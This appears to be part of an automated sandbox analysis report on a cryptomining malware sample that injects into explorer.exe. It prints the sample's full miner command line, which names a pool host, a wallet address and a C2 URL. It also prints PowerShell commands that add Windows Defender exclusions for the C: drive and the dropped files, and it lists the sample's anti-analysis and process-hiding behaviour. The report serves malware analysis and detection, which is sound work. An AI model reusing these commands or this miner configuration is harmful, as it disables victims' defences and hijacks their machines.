                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Windows\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_13-18688
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_13-18688
                    Found evasive API chain checking for user administrative privileges
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_13-18791
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506136526.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506026824.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                    Source: explorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHPYEERYSYJBFOQMOFC
                    Source: explorer.exe, 0000001C.00000003.2506136526.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506026824.000000000141B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEEXE
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE>Q
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="ASRJSKWDSDOC.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --NICEHASH --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="YEERYSYJBFOQMOFC"
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXES\TEMP9,F
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:3333--USER=46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB--PASS=--CPU-MAX-THREADS-HINT=90--CINIT-WINRING=ASRJSKWDSDOC.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--NICEHASH--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=YEERYSYJBFOQMOFCB
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031CA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,13_2_0031CA00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 855Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6192Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3583Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3836Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5862Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1038Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 958Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7363Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2227Jump to behavior
                    Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_16-18695
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sysJump to dropped file
                    Source: C:\Windows\explorer.exeEvaded block: after key decisiongraph_16-18185
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_13-17858
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI coverage: 6.9 %
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeAPI coverage: 9.6 %
                    Source: C:\Users\user\Desktop\file.exe TID: 3716Thread sleep count: 855 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 6192 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 3583 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep count: 3836 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 5862 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\timeout.exe TID: 7396Thread sleep count: 83 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep count: 1038 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep count: 958 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7888Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7876Thread sleep count: 57 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7876Thread sleep time: -57000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 7363 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 2227 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 8064Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\explorer.exeLast function: Thread delayed
                    Source: C:\Windows\explorer.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031CA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,13_2_0031CA90
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00313620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,13_2_00313620
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E097F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,16_2_00E097F0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,18_2_022C7FB0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022DBBF0 GetSystemInfo,18_2_022DBBF0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\295B.tmpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.tmpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmpJump to behavior
                    Source: explorer.exe, 00000010.00000003.2642056847.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: file.exe, 00000000.00000002.1947547762.00000000005EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                    Source: explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: explorer.exe, 00000010.00000003.2015726294.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933740665.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2557868865.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2038161328.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642056847.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015592624.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933414236.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2617916671.0000000000940000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000010.00000003.2015726294.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933740665.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2557868865.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2038161328.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642056847.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015592624.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#k
                    Source: powershell.exe, 00000007.00000002.1827349550.000002386CF5F000.00000004.00000020.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000002.1957167452.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2019228490.0000000000940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3X
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17866
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-18807
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17860
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17887
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-18795
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17857
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-18800
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17880
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17883
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17891
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-20358
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17934
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17894
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeAPI call chain: ExitProcess graph end nodegraph_13-17899
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_16-18697
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00327111 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00327111
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031CA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,13_2_0031CA00
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00305720 GetCurrentProcess,IsWow64Process,GetProcessHeap,13_2_00305720
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00327111 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00327111
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0032A950 SetUnhandledExceptionFilter,13_2_0032A950
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00327FFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00327FFF
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2C4B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00E2C4B0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2E488 SetUnhandledExceptionFilter,16_2_00E2E488
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E30D64 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00E30D64
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2A6E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00E2A6E8
                    Source: C:\Windows\explorer.exeCode function: 18_2_02382A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_02382A80
                    Source: C:\Windows\explorer.exeCode function: 18_2_02385890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_02385890
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCC1190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,19_2_00007FF66CCC1190
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CF844B0 SetUnhandledExceptionFilter,19_2_00007FF66CF844B0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Benign windows process drops PE files
                    Source: C:\Windows\explorer.exeFile created: WindosCPUsystem.exe.16.drJump to dropped file
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 5.188.137.200 3333
                    Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443
                    Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333
                    Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 5200Jump to behavior
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
